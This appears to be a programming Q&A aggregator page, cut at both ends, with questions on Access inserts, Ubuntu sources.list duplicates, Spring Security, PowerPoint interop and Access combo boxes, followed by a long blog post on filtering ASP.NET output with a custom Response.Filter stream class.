'" + dateTimePicker1.Value + "', '" + tb_hp.Text + "', '" + cb_manager.Text + "')"; dbcom = new OleDbCommand(q, con); dbcom.ExecuteNonQuery(); MessageBox.Show("New Employee '" + tb_name.Text + "'- Successfuly Added."); } } else { MessageBox.Show("Employee name '" + tb_name.Text + "' already added into the database"); } ds.Dispose(); } I'm using Microsoft Access 2010 as my database and this is stand alone system. Please help me.

    Read the article

  • remove duplicate source entry [closed]

    - by yosa
    Possible Duplicate: Duplicate sources.list entry but cannot find the duplicates? This is my source.list and seems fine to me # deb cdrom:[Ubuntu 12.04 LTS _Precise Pangolin_ - Release amd64 (20120425)]/ precise main restricted # deb cdrom:[Ubuntu 12.04 LTS _Precise Pangolin_ - Release amd64 (20120425)]/ dists/precise/restricted/binary-i386/ # deb cdrom:[Ubuntu 12.04 LTS _Precise Pangolin_ - Release amd64 (20120425)]/ dists/precise/main/binary-i386/ # deb cdrom:[Ubuntu 11.10]/ natty main restricted # deb cdrom:[Ubuntu 11.04 _Natty Narwhal_ - Release i386 (20110427.1)]/ natty main restricted # deb cdrom:[Ubuntu 11.10 _Oneiric Ocelot_ - Release amd64 (20111012)]/ dists/oneiric/main/binary-i386/ # deb cdrom:[Ubuntu 11.10 _Oneiric Ocelot_ - Release amd64 (20111012)]/ oneiric main restricted # See http://help.ubuntu.com/community/UpgradeNotes for how to upgrade to # newer versions of the distribution. deb http://archive.ubuntu.com/ubuntu precise main restricted ## Major bug fix updates produced after the final release of the ## distribution. ## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu ## team. Also, please note that software in universe WILL NOT receive any ## review or updates from the Ubuntu security team. deb http://archive.ubuntu.com/ubuntu precise universe ## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu ## team, and may not be under a free licence. Please satisfy yourself as to ## your rights to use the software. Also, please note that software in ## multiverse WILL NOT receive any review or updates from the Ubuntu ## security team. deb http://archive.ubuntu.com/ubuntu precise multiverse ## Uncomment the following two lines to add software from the 'backports' ## repository. ## N.B. software from this repository may not have been tested as ## extensively as that contained in the main release, although it includes ## newer versions of some applications which may provide useful features. ## Also, please note that software in backports WILL NOT receive any review ## or updates from the Ubuntu security team. # deb-src http://ma.archive.ubuntu.com/ubuntu/ natty-backports main restricted universe multiverse ## Uncomment the following two lines to add software from Canonical's ## 'partner' repository. ## This software is not part of Ubuntu, but is offered by Canonical and the ## respective vendors as a service to Ubuntu users. deb http://archive.canonical.com/ubuntu precise partner # deb-src http://archive.canonical.com/ubuntu natty partner ## This software is not part of Ubuntu, but is offered by third-party ## developers who want to ship their latest software. deb http://extras.ubuntu.com/ubuntu precise main deb http://archive.ubuntu.com/ubuntu precise-updates restricted main multiverse universe deb http://security.ubuntu.com/ubuntu/ precise-security restricted main multiverse universe deb http://archive.ubuntu.com/ubuntu precise main universe deb-src http://extras.ubuntu.com/ubuntu precise main # See http://help.ubuntu.com/community/UpgradeNotes for how to upgrade to # newer versions of the distribution. deb-src http://archive.ubuntu.com/ubuntu precise main restricted ## Major bug fix updates produced after the final release of the ## distribution. deb http://archive.ubuntu.com/ubuntu precise-updates restricted deb-src http://archive.ubuntu.com/ubuntu precise-updates main restricted ## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu ## team. Also, please note that software in universe WILL NOT receive any ## review or updates from the Ubuntu security team. deb-src http://archive.ubuntu.com/ubuntu precise universe deb-src http://archive.ubuntu.com/ubuntu precise-updates universe ## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu ## team, and may not be under a free licence. Please satisfy yourself as to ## your rights to use the software. Also, please note that software in ## multiverse WILL NOT receive any review or updates from the Ubuntu ## security team. deb-src http://archive.ubuntu.com/ubuntu precise multiverse deb-src http://archive.ubuntu.com/ubuntu precise-updates multiverse ## N.B. software from this repository may not have been tested as ## extensively as that contained in the main release, although it includes ## newer versions of some applications which may provide useful features. ## Also, please note that software in backports WILL NOT receive any review ## or updates from the Ubuntu security team. deb http://archive.ubuntu.com/ubuntu precise-backports main restricted universe multiverse deb-src http://archive.ubuntu.com/ubuntu precise-backports main restricted universe multiverse deb http://archive.ubuntu.com/ubuntu precise-security main restricted deb-src http://archive.ubuntu.com/ubuntu precise-security main restricted deb http://archive.ubuntu.com/ubuntu precise-security universe deb-src http://archive.ubuntu.com/ubuntu precise-security universe deb http://archive.ubuntu.com/ubuntu precise-security multiverse deb-src http://archive.ubuntu.com/ubuntu precise-security multiverse ## Uncomment the following two lines to add software from Canonical's ## 'partner' repository. ## This software is not part of Ubuntu, but is offered by Canonical and the ## respective vendors as a service to Ubuntu users. # deb http://archive.canonical.com/ubuntu oneiric partner # deb-src http://archive.canonical.com/ubuntu oneiric partner ## This software is not part of Ubuntu, but is offered by third-party ## developers who want to ship their latest software. # See http://help.ubuntu.com/community/UpgradeNotes for how to upgrade to # newer versions of the distribution. ## Major bug fix updates produced after the final release of the ## distribution. ## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu ## team. Also, please note that software in universe WILL NOT receive any ## review or updates from the Ubuntu security team. ## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu ## team, and may not be under a free licence. Please satisfy yourself as to ## your rights to use the software. Also, please note that software in ## multiverse WILL NOT receive any review or updates from the Ubuntu ## security team. ## N.B. software from this repository may not have been tested as ## extensively as that contained in the main release, although it includes ## newer versions of some applications which may provide useful features. ## Also, please note that software in backports WILL NOT receive any review ## or updates from the Ubuntu security team. ## Uncomment the following two lines to add software from Canonical's ## 'partner' repository. ## This software is not part of Ubuntu, but is offered by Canonical and the ## respective vendors as a service to Ubuntu users. # deb http://archive.canonical.com/ubuntu precise partner # deb-src http://archive.canonical.com/ubuntu precise partner ## This software is not part of Ubuntu, but is offered by third-party ## developers who want to ship their latest software. # deb http://packages.dotdeb.org stable all # deb-src http://packages.dotdeb.org stable all # deb http://ppa.launchpad.net/bean123ch/burg/ubuntu lucid main # deb-src http://ppa.launchpad.net/bean123ch/burg/ubuntu lucid main this is the error given by apt-get update which stops at 64% reading W: Duplicate sources.list entry http://archive.ubuntu.com/ubuntu/ precise/main amd64 Packages (/var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise_main_binary-amd64_Packages) W: Duplicate sources.list entry http://archive.ubuntu.com/ubuntu/ precise/universe amd64 Packages (/var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise_universe_binary-amd64_Packages) W: Duplicate sources.list entry http://archive.ubuntu.com/ubuntu/ precise/main i386 Packages (/var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise_main_binary-i386_Packages) W: Duplicate sources.list entry http://archive.ubuntu.com/ubuntu/ precise/universe i386 Packages (/var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise_universe_binary-i386_Packages) W: Duplicate sources.list entry http://archive.ubuntu.com/ubuntu/ precise-updates/restricted amd64 Packages (/var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise-updates_restricted_binary-amd64_Packages) W: Duplicate sources.list entry http://archive.ubuntu.com/ubuntu/ precise-updates/restricted i386 Packages (/var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise-updates_restricted_binary-i386_Packages)

    Read the article

  • Best practice to query data from MS SQL Server in C Sharp?

    - by Bruno
    What is the best way to query data from a MS SQL Server in C Sharp? I know that it is not good practice to have an SQL query in the code. Is the best way to create a stored procedure and call it from C Sharp with parameters? using (var conn = new SqlConnection(connStr)) using (var command = new SqlCommand("StoredProc", conn) { CommandType = CommandType.StoredProcedure }) { conn.Open(); command.ExecuteNonQuery(); conn.Close(); }

    Read the article

  • No bean named 'springSecurityFilterChain' is defined

    - by michaeljackson4ever
    When configs are loaded, I get the error SEVERE: Exception starting filter springSecurityFilterChain org.springframework.beans.factory.NoSuchBeanDefinitionException: No bean named 'springSecurityFilterChain' is defined My sec-config: <http use-expressions="true" access-denied-page="/error/casfailed.html" entry-point-ref="headerAuthenticationEntryPoint"> <intercept-url pattern="/" access="permitAll"/> <!-- <intercept-url pattern="/index.html" access="permitAll"/> --> <intercept-url pattern="/index.html" access="hasAnyRole('ROLE_USER')"/> <intercept-url pattern="/history.html" access="hasAnyRole('ROLE_USER')"/> <intercept-url pattern="/absence.html" access="hasAnyRole('ROLE_USER')"/> <intercept-url pattern="/search.html" access="hasAnyRole('ROLE_USER')"/> <intercept-url pattern="/employees.html" access="hasAnyRole('ROLE_USER')"/> <intercept-url pattern="/employee.html" access="hasAnyRole('ROLE_USER')"/> <intercept-url pattern="/contract.html" access="hasAnyRole('ROLE_USER')"/> <intercept-url pattern="/myforms.html" access="hasAnyRole('HLO','OPISK')"/> <intercept-url pattern="/vacationmsg.html" access="hasAnyRole('ROLE_USER')"/> <intercept-url pattern="/redirect.jsp" filters="none" /> <intercept-url pattern="/error/**" filters="none" /> <intercept-url pattern="/layout/**" filters="none" /> <intercept-url pattern="/js/**" filters="none" /> <intercept-url pattern="/**" access="isAuthenticated()" /> <!-- session-management invalid-session-url="/absence.html"/ --> <!-- logout logout-success-url="/logout.html"/ --> <custom-filter ref="ssoHeaderAuthenticationFilter" before="CAS_FILTER"/> <!-- CAS_FILTER ??? --> </http> <authentication-manager alias="authenticationManager"> <authentication-provider ref="doNothingAuthenticationProvider"/> </authentication-manager> <beans:bean id="doNothingAuthenticationProvider" class="com.nixu.security.sso.web.DoNothingAuthenticationProvider"/> <beans:bean id="ssoHeaderAuthenticationFilter" class="com.nixu.security.sso.web.HeaderAuthenticationFilter"> <beans:property name="groups"> <beans:map> <beans:entry key="cn=lake,ou=confluence,dc=utu,dc=fi" value="ROLE_ADMIN"/> </beans:map> </beans:property> </beans:bean> <beans:bean id="headerAuthenticationEntryPoint" class="com.nixu.security.sso.web.HeaderAuthenticationEntryPoint"/> And web.xml <context-param> <param-name>contextConfigLocation</param-name> <param-value> /WEB-INF/applicationContext.xml /WEB-INF/sec-config.xml /WEB-INF/idm-config.xml /WEB-INF/ldap-config.xml </param-value> </context-param> <display-name>KeyCard</display-name> <context-param> <param-name>webAppRootKey</param-name> <param-value>KeyCardAppRoot</param-value> </context-param> <context-param> <param-name>log4jConfigLocation</param-name> <param-value>/WEB-INF/log4j.properties</param-value> </context-param> <!-- Reads request input using UTF-8 encoding --> <filter> <filter-name>characterEncodingFilter</filter-name> <filter-class>org.springframework.web.filter.CharacterEncodingFilter</filter-class> <init-param> <param-name>encoding</param-name> <param-value>UTF-8</param-value> </init-param> <init-param> <param-name>forceEncoding</param-name> <param-value>true</param-value> </init-param> </filter> <filter> <filter-name>springSecurityFilterChain</filter-name> <filter-class>org.springframework.web.filter.DelegatingFilterProxy</filter-class> </filter> <filter-mapping> <filter-name>characterEncodingFilter</filter-name> <url-pattern>/*</url-pattern> </filter-mapping> <filter-mapping> <filter-name>springSecurityFilterChain</filter-name> <url-pattern>/*</url-pattern> </filter-mapping> <listener> <listener-class>org.springframework.web.context.ContextLoaderListener</listener-class> </listener> <listener> <listener-class>org.springframework.web.util.Log4jConfigListener</listener-class> </listener> <listener> <!-- this is for session scoped objects --> <listener-class>org.springframework.web.context.request.RequestContextListener</listener-class> </listener> <listener> <listener-class>org.springframework.security.web.session.HttpSessionEventPublisher</listener-class> </listener> <!-- Handles all requests into the application --> <servlet> <servlet-name>KeyCard</servlet-name> <servlet-class>org.springframework.web.servlet.DispatcherServlet</servlet-class> <load-on-startup>1</load-on-startup> </servlet> <servlet> <servlet-name>tiles</servlet-name> <servlet-class>org.apache.tiles.web.startup.TilesServlet</servlet-class> <init-param> <param-name> org.apache.tiles.impl.BasicTilesContainer.DEFINITIONS_CONFIG </param-name> <param-value> /WEB-INF/tilesViewContext.xml </param-value> </init-param> <load-on-startup>2</load-on-startup> </servlet> <servlet-mapping> <servlet-name>KeyCard</servlet-name> <url-pattern>*.html</url-pattern> </servlet-mapping> <session-config> <session-timeout> 120 </session-timeout> </session-config> <welcome-file-list> <welcome-file>index.jsp</welcome-file> </welcome-file-list> <!-- error-page> <exception-type>java.lang.Exception</exception-type> <location>/WEB-INF/error/error.jsp</location> </error-page --> </web-app> What's wrong?

    Read the article

  • Bullet indents in PowerPoint 2007 compatibility mode via .NET interop issue

    - by L. Shaydariv
    Hello. I've got a really difficult bug and I can't see the fix. The subject drives me insane for real for a long time. Let's consider the following scenario: 1) There is a PowerPoint 2003 presentation. It contains the only slide and the only shape, but the shape contains a text frame including a bulleted list with a random textual representation structure. 2) There is a requirement to get bullet indents for every bulletted paragraph using PowerPoint 2007. I can satisfy the requirement opening the presentation in the compatibility mode and applying the following VBA script: With ActivePresentation Dim sl As Slide: Set sl = .Slides(1) Dim sh As Shape: Set sh = sl.Shapes(1) Dim i As Integer For i = 1 To sh.TextFrame.TextRange.Paragraphs.Count Dim para As TextRange: Set para = sh.TextFrame.TextRange.Paragraphs(i, 1) Debug.Print para.Text; para.indentLevel, sh.TextFrame.Ruler.Levels(para.indentLevel).FirstMargin Next i End With that produces the following output: A 1 0 B 1 0 C 2 24 D 3 60 E 5 132 Obviously, everything is perfect indeed: it has shown the proper list item text, list item level and its bullet indent. But I can't see the way of how I can reach the same result using C#. Let's add a COM-reference to Microsoft.Office.Interop.PowerPoint 2.9.0.0 (taken from MSPPT.OLB, MS Office 12): // presentation = ...("presentation.ppt")... // a PowerPoint 2003 presentation Slide slide = presentation.Slides[1]; Shape shape = slide.Shapes[1]; for (int i = 1; i<=shape.TextFrame.TextRange.Paragraphs(-1, -1).Count; i++) { TextRange paragraph = shape.TextFrame.TextRange.Paragraphs(i, 1); Console.WriteLine("{0} {1} {2}", paragraph.Text, paragraph.IndentLevel, shape.TextFrame.Ruler.Levels[paragraph.IndentLevel].FirstMargin); } Oh, man... What's it? I've got problems here. First, the paragraph.Text value is trimmed until the '\r' character is found (however paragraph.Text[0] really returns the first character O_o). But it's ok, I can shut my eyes to this. But... But, second, I can't understand why the first margins are always zero and it does not matter which level they belong to. They are always zero in the compatibility mode... It's hard to believe it... :) So is there any way to fix it or just to find a workaround? I'd like to accept any help regarding to the solution of the subject. I can't even find any article related to the issue. :( Probably you have ever been face to face with it... Or is it just a bug with no fix and must it be reported to Microsoft? Thanks you.

    Read the article

  • Populating data in multiple cascading dropdown boxes in Access 2007

    - by miCRoSCoPiC_eaRthLinG
    Hello all, I've been assigned the task to design a temporary customer tracking system in MS Access 2007 (sheeeesh!). The tables and relationships have all been setup successfully. But I'm running into a minor problem while trying to design the data entry form for one table... Here's a bit of explanation first. The screen contains 3 dropdown boxes (apart from other fields). 1st dropdown The first dropdown (cboMarket) represents the Market lets users select between 2 options: Domestic International Since the first dropdown contains only 2 items I didn't bother making a table for it. I added them as pre-defined list items. 2nd dropdown Once the user makes a selection in this one, the second dropdown (cboLeadCategory) loads up a list of Lead Categories, namely, Fairs & Exhibitions, Agents, Press Ads, Online Ads etc. Different sets of lead categories are utilized for the 2 markets. Hence this box is dependent on the 1st one. Structure of the bound table, named Lead_Cateogries for the 2nd combo is: ID Autonumber Lead_Type TEXT <- actually a list that takes up Domestic or International Lead_Category_Name TEXT 3rd dropdown And based on the choice of category in the 2nd one, the third one (cboLeadSource) is supposed to display a pre-defined set of lead sources belonging to the particular category. Table is named Lead_Sources and the structure is: ID Autonumber Lead_Category NUMBER <- related to ID of Lead Categories table Lead_Source TEXT When I make the selection in the 1st dropdown, the AfterUpdate event of the combo is called, which instructs the 2nd dropdown to load contents: Private Sub cboMarket_AfterUpdate() Me![cboLead_Category].Requery End Sub The Row Source of the 2nd combo contains a query: SELECT Lead_Categories.ID, Lead_Categories.Lead_Category_Name FROM Lead_Categories WHERE Lead_Categories.Lead_Type=[cboMarket] ORDER BY Lead_Categories.Lead_Category_Name; The AfterUpdate event of 2nd combo is: Private Sub cboLeadCategory_AfterUpdate() Me![cboLeadSource].Requery End Sub The Row Source of 3rd combo contains: SELECT Leads_Sources.ID, Leads_Sources.Lead_Source FROM Leads_Sources WHERE [Lead_Sources].[Lead_Category]=[Lead_Categories].[ID] ORDER BY Leads_Sources.Lead_Source; Problem When I select Market type from cboMarket, the 2nd combo cboLeadCategory loads up the appropriate Categories without a hitch. But when I select a particular Category from it, instead of the 3rd combo loading the lead source names, a modal dialog is displayed asking me to Enter a Parameter. When I enter anything into this prompt (valid or invalid data), I get yet another prompt: Why is this happening? Why isn't the 3rd box loading the source names as desired. Can any one please shed some light on where I am going wrong? Thanks, m^e

    Read the article

  • Capturing and Transforming ASP.NET Output with Response.Filter

    - by Rick Strahl
    During one of my Handlers and Modules session at DevConnections this week one of the attendees asked a question that I didn’t have an immediate answer for. Basically he wanted to capture response output completely and then apply some filtering to the output – effectively injecting some additional content into the page AFTER the page had completely rendered. Specifically the output should be captured from anywhere – not just a page and have this code injected into the page. Some time ago I posted some code that allows you to capture ASP.NET Page output by overriding the Render() method, capturing the HtmlTextWriter() and reading its content, modifying the rendered data as text then writing it back out. I’ve actually used this approach on a few occasions and it works fine for ASP.NET pages. But this obviously won’t work outside of the Page class environment and it’s not really generic – you have to create a custom page class in order to handle the output capture. [updated 11/16/2009 – updated ResponseFilterStream implementation and a few additional notes based on comments] Enter Response.Filter However, ASP.NET includes a Response.Filter which can be used – well to filter output. Basically Response.Filter is a stream through which the OutputStream is piped back to the Web Server (indirectly). As content is written into the Response object, the filter stream receives the appropriate Stream commands like Write, Flush and Close as well as read operations although for a Response.Filter that’s uncommon to be hit. The Response.Filter can be programmatically replaced at runtime which allows you to effectively intercept all output generation that runs through ASP.NET. A common Example: Dynamic GZip Encoding A rather common use of Response.Filter hooking up code based, dynamic  GZip compression for requests which is dead simple by applying a GZipStream (or DeflateStream) to Response.Filter. The following generic routines can be used very easily to detect GZip capability of the client and compress response output with a single line of code and a couple of library helper routines: WebUtils.GZipEncodePage(); which is handled with a few lines of reusable code and a couple of static helper methods: /// <summary> ///Sets up the current page or handler to use GZip through a Response.Filter ///IMPORTANT:  ///You have to call this method before any output is generated! /// </summary> public static void GZipEncodePage() {     HttpResponse Response = HttpContext.Current.Response;     if(IsGZipSupported())     {         stringAcceptEncoding = HttpContext.Current.Request.Headers["Accept-Encoding"];         if(AcceptEncoding.Contains("deflate"))         {             Response.Filter = newSystem.IO.Compression.DeflateStream(Response.Filter,                                        System.IO.Compression.CompressionMode.Compress);             Response.AppendHeader("Content-Encoding", "deflate");         }         else        {             Response.Filter = newSystem.IO.Compression.GZipStream(Response.Filter,                                       System.IO.Compression.CompressionMode.Compress);             Response.AppendHeader("Content-Encoding", "gzip");                            }     }     // Allow proxy servers to cache encoded and unencoded versions separately    Response.AppendHeader("Vary", "Content-Encoding"); } /// <summary> /// Determines if GZip is supported /// </summary> /// <returns></returns> public static bool IsGZipSupported() { string AcceptEncoding = HttpContext.Current.Request.Headers["Accept-Encoding"]; if (!string.IsNullOrEmpty(AcceptEncoding) && (AcceptEncoding.Contains("gzip") || AcceptEncoding.Contains("deflate"))) return true; return false; } GZipStream and DeflateStream are streams that are assigned to Response.Filter and by doing so apply the appropriate compression on the active Response. Response.Filter content is chunked So to implement a Response.Filter effectively requires only that you implement a custom stream and handle the Write() method to capture Response output as it’s written. At first blush this seems very simple – you capture the output in Write, transform it and write out the transformed content in one pass. And that indeed works for small amounts of content. But you see, the problem is that output is written in small buffer chunks (a little less than 16k it appears) rather than just a single Write() statement into the stream, which makes perfect sense for ASP.NET to stream data back to IIS in smaller chunks to minimize memory usage en route. Unfortunately this also makes it a more difficult to implement any filtering routines since you don’t directly get access to all of the response content which is problematic especially if those filtering routines require you to look at the ENTIRE response in order to transform or capture the output as is needed for the solution the gentleman in my session asked for. So in order to address this a slightly different approach is required that basically captures all the Write() buffers passed into a cached stream and then making the stream available only when it’s complete and ready to be flushed. As I was thinking about the implementation I also started thinking about the few instances when I’ve used Response.Filter implementations. Each time I had to create a new Stream subclass and create my custom functionality but in the end each implementation did the same thing – capturing output and transforming it. I thought there should be an easier way to do this by creating a re-usable Stream class that can handle stream transformations that are common to Response.Filter implementations. Creating a semi-generic Response Filter Stream Class What I ended up with is a ResponseFilterStream class that provides a handful of Events that allow you to capture and/or transform Response content. The class implements a subclass of Stream and then overrides Write() and Flush() to handle capturing and transformation operations. By exposing events it’s easy to hook up capture or transformation operations via single focused methods. ResponseFilterStream exposes the following events: CaptureStream, CaptureString Captures the output only and provides either a MemoryStream or String with the final page output. Capture is hooked to the Flush() operation of the stream. TransformStream, TransformString Allows you to transform the complete response output with events that receive a MemoryStream or String respectively and can you modify the output then return it back as a return value. The transformed output is then written back out in a single chunk to the response output stream. These events capture all output internally first then write the entire buffer into the response. TransformWrite, TransformWriteString Allows you to transform the Response data as it is written in its original chunk size in the Stream’s Write() method. Unlike TransformStream/TransformString which operate on the complete output, these events only see the current chunk of data written. This is more efficient as there’s no caching involved, but can cause problems due to searched content splitting over multiple chunks. Using this implementation, creating a custom Response.Filter transformation becomes as simple as the following code. To hook up the Response.Filter using the MemoryStream version event: ResponseFilterStream filter = new ResponseFilterStream(Response.Filter); filter.TransformStream += filter_TransformStream; Response.Filter = filter; and the event handler to do the transformation: MemoryStream filter_TransformStream(MemoryStream ms) { Encoding encoding = HttpContext.Current.Response.ContentEncoding; string output = encoding.GetString(ms.ToArray()); output = FixPaths(output); ms = new MemoryStream(output.Length); byte[] buffer = encoding.GetBytes(output); ms.Write(buffer,0,buffer.Length); return ms; } private string FixPaths(string output) { string path = HttpContext.Current.Request.ApplicationPath; // override root path wonkiness if (path == "/") path = ""; output = output.Replace("\"~/", "\"" + path + "/").Replace("'~/", "'" + path + "/"); return output; } The idea of the event handler is that you can do whatever you want to the stream and return back a stream – either the same one that’s been modified or a brand new one – which is then sent back to as the final response. The above code can be simplified even more by using the string version events which handle the stream to string conversions for you: ResponseFilterStream filter = new ResponseFilterStream(Response.Filter); filter.TransformString += filter_TransformString; Response.Filter = filter; and the event handler to do the transformation calling the same FixPaths method shown above: string filter_TransformString(string output) { return FixPaths(output); } The events for capturing output and capturing and transforming chunks work in a very similar way. By using events to handle the transformations ResponseFilterStream becomes a reusable component and we don’t have to create a new stream class or subclass an existing Stream based classed. By the way, the example used here is kind of a cool trick which transforms “~/” expressions inside of the final generated HTML output – even in plain HTML controls not HTML controls – and transforms them into the appropriate application relative path in the same way that ResolveUrl would do. So you can write plain old HTML like this: <a href=”~/default.aspx”>Home</a>  and have it turned into: <a href=”/myVirtual/default.aspx”>Home</a>  without having to use an ASP.NET control like Hyperlink or Image or having to constantly use: <img src=”<%= ResolveUrl(“~/images/home.gif”) %>” /> in MVC applications (which frankly is one of the most annoying things about MVC especially given the path hell that extension-less and endpoint-less URLs impose). I can’t take credit for this idea. While discussing the Response.Filter issues on Twitter a hint from Dylan Beattie who pointed me at one of his examples which does something similar. I thought the idea was cool enough to use an example for future demos of Response.Filter functionality in ASP.NET next I time I do the Modules and Handlers talk (which was great fun BTW). How practical this is is debatable however since there’s definitely some overhead to using a Response.Filter in general and especially on one that caches the output and the re-writes it later. Make sure to test for performance anytime you use Response.Filter hookup and make sure it' doesn’t end up killing perf on you. You’ve been warned :-}. How does ResponseFilterStream work? The big win of this implementation IMHO is that it’s a reusable  component – so for implementation there’s no new class, no subclassing – you simply attach to an event to implement an event handler method with a straight forward signature to retrieve the stream or string you’re interested in. The implementation is based on a subclass of Stream as is required in order to handle the Response.Filter requirements. What’s different than other implementations I’ve seen in various places is that it supports capturing output as a whole to allow retrieving the full response output for capture or modification. The exception are the TransformWrite and TransformWrite events which operate only active chunk of data written by the Response. For captured output, the Write() method captures output into an internal MemoryStream that is cached until writing is complete. So Write() is called when ASP.NET writes to the Response stream, but the filter doesn’t pass on the Write immediately to the filter’s internal stream. The data is cached and only when the Flush() method is called to finalize the Stream’s output do we actually send the cached stream off for transformation (if the events are hooked up) and THEN finally write out the returned content in one big chunk. Here’s the implementation of ResponseFilterStream: /// <summary> /// A semi-generic Stream implementation for Response.Filter with /// an event interface for handling Content transformations via /// Stream or String. /// <remarks> /// Use with care for large output as this implementation copies /// the output into a memory stream and so increases memory usage. /// </remarks> /// </summary> public class ResponseFilterStream : Stream { /// <summary> /// The original stream /// </summary> Stream _stream; /// <summary> /// Current position in the original stream /// </summary> long _position; /// <summary> /// Stream that original content is read into /// and then passed to TransformStream function /// </summary> MemoryStream _cacheStream = new MemoryStream(5000); /// <summary> /// Internal pointer that that keeps track of the size /// of the cacheStream /// </summary> int _cachePointer = 0; /// <summary> /// /// </summary> /// <param name="responseStream"></param> public ResponseFilterStream(Stream responseStream) { _stream = responseStream; } /// <summary> /// Determines whether the stream is captured /// </summary> private bool IsCaptured { get { if (CaptureStream != null || CaptureString != null || TransformStream != null || TransformString != null) return true; return false; } } /// <summary> /// Determines whether the Write method is outputting data immediately /// or delaying output until Flush() is fired. /// </summary> private bool IsOutputDelayed { get { if (TransformStream != null || TransformString != null) return true; return false; } } /// <summary> /// Event that captures Response output and makes it available /// as a MemoryStream instance. Output is captured but won't /// affect Response output. /// </summary> public event Action<MemoryStream> CaptureStream; /// <summary> /// Event that captures Response output and makes it available /// as a string. Output is captured but won't affect Response output. /// </summary> public event Action<string> CaptureString; /// <summary> /// Event that allows you transform the stream as each chunk of /// the output is written in the Write() operation of the stream. /// This means that that it's possible/likely that the input /// buffer will not contain the full response output but only /// one of potentially many chunks. /// /// This event is called as part of the filter stream's Write() /// operation. /// </summary> public event Func<byte[], byte[]> TransformWrite; /// <summary> /// Event that allows you to transform the response stream as /// each chunk of bytep[] output is written during the stream's write /// operation. This means it's possibly/likely that the string /// passed to the handler only contains a portion of the full /// output. Typical buffer chunks are around 16k a piece. /// /// This event is called as part of the stream's Write operation. /// </summary> public event Func<string, string> TransformWriteString; /// <summary> /// This event allows capturing and transformation of the entire /// output stream by caching all write operations and delaying final /// response output until Flush() is called on the stream. /// </summary> public event Func<MemoryStream, MemoryStream> TransformStream; /// <summary> /// Event that can be hooked up to handle Response.Filter /// Transformation. Passed a string that you can modify and /// return back as a return value. The modified content /// will become the final output. /// </summary> public event Func<string, string> TransformString; protected virtual void OnCaptureStream(MemoryStream ms) { if (CaptureStream != null) CaptureStream(ms); } private void OnCaptureStringInternal(MemoryStream ms) { if (CaptureString != null) { string content = HttpContext.Current.Response.ContentEncoding.GetString(ms.ToArray()); OnCaptureString(content); } } protected virtual void OnCaptureString(string output) { if (CaptureString != null) CaptureString(output); } protected virtual byte[] OnTransformWrite(byte[] buffer) { if (TransformWrite != null) return TransformWrite(buffer); return buffer; } private byte[] OnTransformWriteStringInternal(byte[] buffer) { Encoding encoding = HttpContext.Current.Response.ContentEncoding; string output = OnTransformWriteString(encoding.GetString(buffer)); return encoding.GetBytes(output); } private string OnTransformWriteString(string value) { if (TransformWriteString != null) return TransformWriteString(value); return value; } protected virtual MemoryStream OnTransformCompleteStream(MemoryStream ms) { if (TransformStream != null) return TransformStream(ms); return ms; } /// <summary> /// Allows transforming of strings /// /// Note this handler is internal and not meant to be overridden /// as the TransformString Event has to be hooked up in order /// for this handler to even fire to avoid the overhead of string /// conversion on every pass through. /// </summary> /// <param name="responseText"></param> /// <returns></returns> private string OnTransformCompleteString(string responseText) { if (TransformString != null) TransformString(responseText); return responseText; } /// <summary> /// Wrapper method form OnTransformString that handles /// stream to string and vice versa conversions /// </summary> /// <param name="ms"></param> /// <returns></returns> internal MemoryStream OnTransformCompleteStringInternal(MemoryStream ms) { if (TransformString == null) return ms; //string content = ms.GetAsString(); string content = HttpContext.Current.Response.ContentEncoding.GetString(ms.ToArray()); content = TransformString(content); byte[] buffer = HttpContext.Current.Response.ContentEncoding.GetBytes(content); ms = new MemoryStream(); ms.Write(buffer, 0, buffer.Length); //ms.WriteString(content); return ms; } /// <summary> /// /// </summary> public override bool CanRead { get { return true; } } public override bool CanSeek { get { return true; } } /// <summary> /// /// </summary> public override bool CanWrite { get { return true; } } /// <summary> /// /// </summary> public override long Length { get { return 0; } } /// <summary> /// /// </summary> public override long Position { get { return _position; } set { _position = value; } } /// <summary> /// /// </summary> /// <param name="offset"></param> /// <param name="direction"></param> /// <returns></returns> public override long Seek(long offset, System.IO.SeekOrigin direction) { return _stream.Seek(offset, direction); } /// <summary> /// /// </summary> /// <param name="length"></param> public override void SetLength(long length) { _stream.SetLength(length); } /// <summary> /// /// </summary> public override void Close() { _stream.Close(); } /// <summary> /// Override flush by writing out the cached stream data /// </summary> public override void Flush() { if (IsCaptured && _cacheStream.Length > 0) { // Check for transform implementations _cacheStream = OnTransformCompleteStream(_cacheStream); _cacheStream = OnTransformCompleteStringInternal(_cacheStream); OnCaptureStream(_cacheStream); OnCaptureStringInternal(_cacheStream); // write the stream back out if output was delayed if (IsOutputDelayed) _stream.Write(_cacheStream.ToArray(), 0, (int)_cacheStream.Length); // Clear the cache once we've written it out _cacheStream.SetLength(0); } // default flush behavior _stream.Flush(); } /// <summary> /// /// </summary> /// <param name="buffer"></param> /// <param name="offset"></param> /// <param name="count"></param> /// <returns></returns> public override int Read(byte[] buffer, int offset, int count) { return _stream.Read(buffer, offset, count); } /// <summary> /// Overriden to capture output written by ASP.NET and captured /// into a cached stream that is written out later when Flush() /// is called. /// </summary> /// <param name="buffer"></param> /// <param name="offset"></param> /// <param name="count"></param> public override void Write(byte[] buffer, int offset, int count) { if ( IsCaptured ) { // copy to holding buffer only - we'll write out later _cacheStream.Write(buffer, 0, count); _cachePointer += count; } // just transform this buffer if (TransformWrite != null) buffer = OnTransformWrite(buffer); if (TransformWriteString != null) buffer = OnTransformWriteStringInternal(buffer); if (!IsOutputDelayed) _stream.Write(buffer, offset, buffer.Length); } } The key features are the events and corresponding OnXXX methods that handle the event hookups, and the Write() and Flush() methods of the stream implementation. All the rest of the members tend to be plain jane passthrough stream implementation code without much consequence. I do love the way Action<t> and Func<T> make it so easy to create the event signatures for the various events – sweet. A few Things to consider Performance Response.Filter is not great for 